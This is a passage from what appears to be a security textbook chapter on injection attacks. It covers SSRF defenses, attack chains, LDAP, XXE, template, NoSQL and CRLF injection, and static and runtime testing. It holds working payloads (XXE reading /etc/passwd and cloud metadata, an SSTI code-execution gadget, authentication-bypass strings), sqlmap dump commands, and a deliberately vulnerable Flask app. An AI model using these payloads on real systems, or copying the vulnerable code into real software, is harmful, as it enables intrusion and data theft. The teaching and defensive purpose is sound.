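    netloc = ip if parsed.port is None else f"{ip}:{parsed.port}"
    pinned_url = parsed._replace(netloc=netloc).geturl()
    # Override the Host header to maintain virtual hosting.
    # Note: for https, connecting by IP breaks SNI and certificate
    # verification; a custom transport adapter is needed in that case.
    response = requests.get(
        pinned_url,
        headers={'Host': parsed.hostname},
        allow_redirects=False,  # Don't follow redirects (could redirect to internal)
        timeout=5
    )
    return response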
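- Network-level controls: Use firewall rules to prevent the application server from reaching the metadata endpoint or internal services it does not need. Network-layer restrictions are more reliable than application-level validation because they still hold when the validation is bypassed. Note that AWS security groups do not filter traffic to the metadata endpoint, so blocking it requires a host-level rule (for example, iptables).
- Disable unnecessary URL schemes. Block `file://`, `gopher://`, `dict://`, `ftp://`, `ldap://`.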
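The allowlist and scheme restrictions from the list above can be sketched in a few lines. The host names in `ALLOWED_HOSTS` are placeholders and `is_allowlisted` is a hypothetical helper; a real deployment would load the list from configuration and combine this check with the resolved-IP validation.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist; a real deployment would load this from configuration.
ALLOWED_HOSTS = {"api.example.com", "images.example.com"}
ALLOWED_SCHEMES = {"https"}

def is_allowlisted(url: str) -> bool:
    """Accept only https URLs whose exact host is on the allowlist."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False  # rejects file://, gopher://, dict://, ftp://, ldap://
    if parts.username is not None or parts.password is not None:
        return False  # rejects the user@host trick
    host = (parts.hostname or "").rstrip(".").lower()
    return host in ALLOWED_HOSTS  # exact match, not a suffix or substring
```

Exact matching matters: a suffix or substring test would accept `api.example.com.evil.com`.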
DNS rebinding can bypass IP validation. The hostname resolves to a public IP during validation, then to a private IP during the actual request (the attacker's DNS server returns different IPs with short TTLs). To defend against this:
- Pin the resolved IP and use it for the actual request (shown above)
- Use a dedicated DNS resolver that blocks private IP responses for external domains
- Disable `allow_redirects` -- the redirect target could be an internal URL
- Set a connection timeout to limit how long the resolution window is open
Cross-Pollination: Injection Chains
In real breaches, attackers almost always chain vulnerabilities. A single vulnerability gives a foothold; chains give full compromise.
graph TD
A[XSS: Steal admin session cookie] --> B[Authenticated access to admin panel]
B --> C[Admin panel has SSRF via webhook feature]
C --> D[SSRF: Access internal code review tool]
D --> E[Find database credentials in code]
E --> F[SQL injection on internal service<br/>using discovered credentials]
F --> G[Full database dump]
H[SSRF: Access internal Redis] --> I[Redis: Write SSH key to authorized_keys]
I --> J[SSH access to internal server]
J --> K[Credential harvesting from .env files]
K --> L[Pivot to production database]
style G fill:#ff6b6b,stroke:#c0392b,color:#fff
style L fill:#ff6b6b,stroke:#c0392b,color:#fff
Common attack chains in the wild:
- SSRF -> Credential Theft -> Database Compromise: Use SSRF to access cloud metadata, steal IAM credentials, access databases directly (Capital One)
- Stored XSS -> Session Hijacking -> Admin Access -> RCE: Plant XSS payload, steal admin cookies, access admin panel with file upload, upload webshell
- SQL Injection -> File Read -> Source Code -> More Injection: Use `LOAD_FILE()` to read application source code, find additional injection points and credentials
- Command Injection -> Reverse Shell -> Lateral Movement: Execute a reverse shell, pivot to internal network, discover and exploit unpatched services
This is why every service, even internal ones, must validate input and use parameterized queries. "It's behind the firewall" is not a security control -- it is an assumption about the network that will eventually be proven wrong.
Injection in Non-Traditional Contexts
Injection is not limited to SQL and shell commands. Any interpreter is a target.
LDAP Injection
# Normal LDAP query
(&(username=arjun)(password=secret))
# Injected username: *)(&
# Result: (&(username=*)(&)(password=anything))
# The * matches all usernames, the (&) is always true
# The attacker authenticates as the first user in the directory
# Defense: escape LDAP filter special characters (* ( ) \ NUL)
# Use LDAP SDKs that provide parameterized search filters
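A minimal sketch of that escaping is shown below, following the hex-escape form defined for search filters in RFC 4515. The function names and the filter layout are illustrative; where an LDAP library offers its own filter-escaping helper, that is the better choice.

```python
# Characters that must be escaped in an LDAP filter value (RFC 4515).
_LDAP_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}

def escape_ldap_filter_value(value: str) -> str:
    """Replace each special character with its backslash-hex escape."""
    return "".join(_LDAP_FILTER_ESCAPES.get(ch, ch) for ch in value)

def build_login_filter(username: str, password: str) -> str:
    """Build the example filter with both values escaped."""
    return "(&(username={})(password={}))".format(
        escape_ldap_filter_value(username),
        escape_ldap_filter_value(password),
    )

# The injected username from the example above no longer changes the structure.
safe_filter = build_login_filter("*)(&", "anything")
```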
XML Injection (XXE -- XML External Entity)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
<name>&xxe;</name>
</user>
The XML parser resolves the entity, reading /etc/passwd and including its contents in the response. XXE can also be used for SSRF:
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
Defense: Disable external entity resolution in the XML parser:
# Python (lxml)
from lxml import etree
parser = etree.XMLParser(resolve_entities=False, no_network=True)
# Java (DocumentBuilderFactory)
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
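The same "refuse any DOCTYPE" policy as the Java setting can be approximated in Python with only the standard library, by raising from expat's doctype handler. This is a sketch with hypothetical names (`DoctypeForbidden`, `element_names`), not a substitute for a hardened parser configuration.

```python
import xml.parsers.expat

class DoctypeForbidden(ValueError):
    """Raised when a document declares a DOCTYPE."""

def element_names(xml_text: str) -> list[str]:
    """Parse XML and return element names, rejecting any DOCTYPE."""
    names: list[str] = []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Entities can only be declared inside a DOCTYPE, so stop here.
        raise DoctypeForbidden("DOCTYPE declarations are not allowed")

    def on_start(name, attrs):
        names.append(name)

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.Parse(xml_text, True)  # True marks this as the final chunk
    return names

# The XXE document from the example above.
XXE_DOCUMENT = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    "<user><name>&xxe;</name></user>"
)
```

Calling `element_names(XXE_DOCUMENT)` raises `DoctypeForbidden` before any entity is resolved, while ordinary documents without a DOCTYPE parse normally.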
Template Injection (SSTI -- Server-Side Template Injection)
# Jinja2 -- VULNERABLE if user input IS the template
from jinja2 import Template
template = Template(user_input) # user_input controls the template itself
template.render()
# If user_input is: {{ config.items() }}
# Returns the application's entire configuration including secret keys
# If user_input is: {{ ''.__class__.__mro__[1].__subclasses__() }}
# Returns all Python classes -- can be used for RCE
# SAFE: user input as DATA, not template
template = Template("Hello, {{ name }}")
template.render(name=user_input)
NoSQL Injection
// MongoDB -- VULNERABLE
db.users.find({
username: req.body.username,
password: req.body.password
});
// Attacker sends JSON body:
// { "username": "admin", "password": { "$ne": "" } }
// Query becomes: find where username='admin' AND password != ''
// Matches the admin account regardless of actual password
// Another attack:
// { "username": { "$gt": "" }, "password": { "$gt": "" } }
// Returns all users where username and password are non-empty
// Defense: validate input types strictly
if (typeof req.body.password !== 'string') {
return res.status(400).json({error: 'Invalid input type'});
}
// Or use a schema validator like Joi or Zod
const schema = Joi.object({
username: Joi.string().required().max(100),
password: Joi.string().required().max(200)
});
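The same type check carries over to a Python backend. The sketch below uses a hypothetical `validate_login_body` helper and mirrors the length limits from the schema above; it rejects operator objects such as `{"$ne": ""}` before they can reach the database driver.

```python
import json

def validate_login_body(body: object) -> tuple[str, str]:
    """Return (username, password) or raise ValueError for unsafe input."""
    if not isinstance(body, dict):
        raise ValueError("body must be a JSON object")
    username = body.get("username")
    password = body.get("password")
    # Operator payloads arrive as dicts, so insisting on str blocks them.
    if not isinstance(username, str) or not isinstance(password, str):
        raise ValueError("username and password must be strings")
    if not username or len(username) > 100:
        raise ValueError("username length out of range")
    if not password or len(password) > 200:
        raise ValueError("password length out of range")
    return username, password

# The attack body from the example above, as it would arrive after JSON parsing.
attack_body = json.loads('{"username": "admin", "password": {"$ne": ""}}')
```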
Header Injection (CRLF Injection)
# VULNERABLE -- user input in HTTP header
from flask import Flask, request, make_response
app = Flask(__name__)
@app.route('/redirect')
def redirect():
    url = request.args.get('url')
    response = make_response('', 302)
    response.headers['Location'] = url
    return response
# Attacker input: /home%0d%0aSet-Cookie:%20admin=true
# Results in injected header (when the framework does not reject CR/LF in header values):
# Location: /home
# Set-Cookie: admin=true
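One possible defense is to validate the redirect target before it reaches the header. The sketch below assumes the application only ever redirects to same-site paths; `safe_redirect_target` is a hypothetical helper, and the fallback of `/` is an arbitrary choice.

```python
from urllib.parse import urlsplit

def safe_redirect_target(target: str, default: str = "/") -> str:
    """Return target only if it is a same-site path with no control characters."""
    # CR, LF, and other control characters must never reach a header value.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in target):
        return default
    # Some browsers treat backslashes like forward slashes.
    if "\\" in target:
        return default
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        return default  # absolute or protocol-relative URL
    if not target.startswith("/") or target.startswith("//"):
        return default
    return target

# The decoded attacker input from the example above.
injected = "/home\r\nSet-Cookie: admin=true"
cleaned = safe_redirect_target(injected)
```

As a side effect, restricting targets to local paths also closes the open-redirect hole in the original handler.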
Practical Detection and Testing
Static Analysis -- Finding Injection Before Production
# Search for SQL injection patterns in Python code
grep -rn "f\"SELECT\|f\"INSERT\|f\"UPDATE\|f\"DELETE\|\.format.*SELECT" src/
grep -rn "\.raw(f\"\|\.extra(where=" src/
# Search for command injection patterns
grep -rn "os\.system\|os\.popen\|subprocess.*shell=True" src/
# Search for XSS patterns (missing escaping)
grep -rn "innerHTML\|outerHTML\|document\.write\|\.html(" src/
grep -rn "dangerouslySetInnerHTML\|v-html" src/
# Use Semgrep for more sophisticated detection
semgrep --config=p/owasp-top-ten src/
semgrep --config=p/python.flask src/
semgrep --config=p/javascript.express src/
# Use Bandit for Python security analysis
bandit -r src/ -ll
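The grep patterns above match text, so they miss queries split across lines and flag strings that are never executed. As a rough complement, Python's `ast` module can flag calls where a dynamically built string is the first argument to `execute`. The function name and the sample source are illustrative, and the check is deliberately narrow: it does not follow variables or recognize `.format()` calls.

```python
import ast

def find_dynamic_queries(source: str) -> list[int]:
    """Return line numbers where execute()/executemany() receives an
    f-string or a string built with an operator such as + or %."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if (
            isinstance(node, ast.Call)
            and isinstance(node.func, ast.Attribute)
            and node.func.attr in {"execute", "executemany"}
            and node.args
            and isinstance(node.args[0], (ast.JoinedStr, ast.BinOp))
        ):
            hits.append(node.lineno)
    return sorted(hits)

# Sample input: line 2 uses an f-string, line 3 is parameterized,
# line 4 uses string concatenation.
SAMPLE = '''
cur.execute(f"SELECT * FROM t WHERE id = {uid}")
cur.execute("SELECT * FROM t WHERE id = ?", (uid,))
cur.execute("SELECT * FROM t WHERE name = '" + name + "'")
'''

flagged = find_dynamic_queries(SAMPLE)
```

Dedicated tools such as Semgrep and Bandit cover far more patterns; a check like this is mainly useful as a project-specific lint rule.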
Runtime Testing with sqlmap
# Test a GET parameter with more thorough checks (higher level and risk)
sqlmap -u "http://target.com/page?id=1" \
--batch --level=3 --risk=2 \
--threads=4
# Test a POST form
sqlmap -u "http://target.com/login" \
--data="username=test&password=test" \
--batch
# Test with authentication cookie
sqlmap -u "http://target.com/api/data?id=1" \
--cookie="session=abc123" --batch
# Test JSON API
sqlmap -u "http://target.com/api/users" \
--data='{"id":1}' \
--content-type="application/json" --batch
# Enumerate everything
sqlmap -u "http://target.com/page?id=1" \
--dbs \
--tables \
--columns \
--dump \
--batch
XSS and Header Testing with curl
# Check if reflected input is encoded
curl -s "http://target.com/search?q=%3Cscript%3Ealert(1)%3C/script%3E" \
| grep -c '<script>alert(1)</script>'
# Result > 0 means vulnerable (script tag rendered literally)
# Check security headers
curl -sI "http://target.com/" \
| grep -iE '(content-security|x-frame|x-content-type|strict-transport)'
# Check SSRF potential
curl -s "http://target.com/fetch?url=http://169.254.169.254/"
# If this returns metadata -- SSRF exists
Create a test harness to practice injection detection and fixing:
~~~python
# vulnerable_app.py -- for LOCAL TESTING ONLY
from flask import Flask, request
import sqlite3

app = Flask(__name__)

def init_db():
    # check_same_thread=False lets Flask's threaded dev server share the connection
    conn = sqlite3.connect(':memory:', check_same_thread=False)
    conn.execute("CREATE TABLE items (id INTEGER, name TEXT, price REAL)")
    conn.execute("INSERT INTO items VALUES (1, 'Widget', 9.99)")
    conn.execute("INSERT INTO items VALUES (2, 'Gadget', 19.99)")
    conn.commit()
    return conn

DB = init_db()

@app.route('/search')
def search():
    q = request.args.get('q', '')
    # DELIBERATELY VULNERABLE -- for learning
    results = DB.execute(f"SELECT * FROM items WHERE name LIKE '%{q}%'").fetchall()
    return f"<h1>Results for: {q}</h1><pre>{results}</pre>"

if __name__ == '__main__':
    app.run(debug=True, port=5000)
~~~
Then fix it:
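~~~python
# secure_app.py
from flask import Flask, request
from markupsafe import escape
import sqlite3

app = Flask(__name__)

def init_db():
    # Same in-memory test data as vulnerable_app.py
    conn = sqlite3.connect(':memory:', check_same_thread=False)
    conn.execute("CREATE TABLE items (id INTEGER, name TEXT, price REAL)")
    conn.execute("INSERT INTO items VALUES (1, 'Widget', 9.99)")
    conn.execute("INSERT INTO items VALUES (2, 'Gadget', 19.99)")
    conn.commit()
    return conn

DB = init_db()

@app.route('/search')
def search():
    q = request.args.get('q', '')
    # PARAMETERIZED QUERY -- immune to SQL injection
    results = DB.execute(
        "SELECT * FROM items WHERE name LIKE ?",
        (f'%{q}%',)
    ).fetchall()
    # OUTPUT ENCODING -- immune to XSS
    return f"<h1>Results for: {escape(q)}</h1><pre>{escape(str(results))}</pre>"

if __name__ == '__main__':
    app.run(port=5000)
~~~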
Test both versions:
~~~bash
# Against vulnerable version -- returns all items
curl -G "http://localhost:5000/search" --data-urlencode "q=' OR '1'='1"
# Against secure version -- returns no matches (searches for literal string)
curl -G "http://localhost:5000/search" --data-urlencode "q=' OR '1'='1"
~~~
What You've Learned
This chapter covered the fundamental injection attack categories that continue to dominate real-world breaches:
- SQL Injection -- classic, blind (boolean and time-based), UNION-based, and second-order. The fix is parameterized queries, not escaping. Parameterization works because the query structure is compiled before data is seen -- the parser cannot be confused. Every query, every time, even for "trusted" data from your own database.
- Command Injection -- OS command execution through shell metacharacters. The fix is avoiding `system()` calls entirely, or using array-based execution (`subprocess.run(["cmd", "arg"])`) that bypasses the shell. When the shell is not involved, metacharacters have no special meaning.
- Cross-Site Scripting (XSS) -- reflected, stored, and DOM-based. The fix is context-aware output encoding, CSP headers with nonces, and HttpOnly cookies. Template engines with auto-escaping are your primary defense. Use DOMPurify when you must render user-generated HTML.
- Server-Side Request Forgery (SSRF) -- making the server request internal resources. The fix is URL allowlisting, IP validation after DNS resolution with pinning, IMDSv2 on cloud platforms, and network-level restrictions. The Capital One breach demonstrated the catastrophic potential.
- The common thread -- all injection attacks exploit the mixing of data and code in the same channel. Separating these channels (parameterized queries, array-based command execution, auto-escaping templates, URL allowlists) is the architectural solution. The attacker's strategy is always the same: find where data crosses into an interpreter and make it execute.
The pattern is always the same: untrusted data gets interpreted as instructions. Different interpreters, different syntax, same fundamental mistake. If you internalize one principle from this chapter, let it be this: data must never become code unless you explicitly intend it to. Build your systems so that this separation is the default, and you will eliminate entire classes of vulnerabilities before they ever appear.
When you see string concatenation building a query or command, fix it. Then add a linter rule so nobody can write it again. Then check the git history to see how long it has been there -- and start incident response if the answer is "long enough."